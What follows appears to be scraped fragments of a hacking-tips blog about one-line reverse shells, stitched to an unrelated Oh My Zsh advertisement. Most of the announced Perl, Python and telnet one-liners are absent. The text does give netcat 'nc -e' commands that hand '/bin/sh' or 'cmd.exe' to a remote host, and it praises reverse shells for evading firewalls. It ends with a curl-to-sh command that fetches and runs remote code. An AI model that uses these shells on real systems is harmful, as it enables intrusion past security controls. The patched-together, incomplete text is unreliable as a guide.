Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.
Perl Reverse Shells
If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.
Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.
Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages
Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.
In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.
Python Reverse Shell:
This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.
Jeet Kun Crypto isn’t a real thing, just a term I’m applying a new section of one-liners that are strictly security related. In that sense, I mean to say they’re penetration test, or at least vulnerability discovery related. It’s a joke. A play on an old tendency to refer to skillfully written and security related code as “kung foo”.
One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.
While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:
Versions that support "-e":
nc -e "/bin/sh" <target> <target port>
nc -e "cmd.exe" <target> <target port>
If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:
Oh My Zsh is a delightful, open source, community-driven framework for managing your Zsh configuration. It comes bundled with thousands of helpful functions, helpers, plugins, themes, and a few things that make you shout…
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"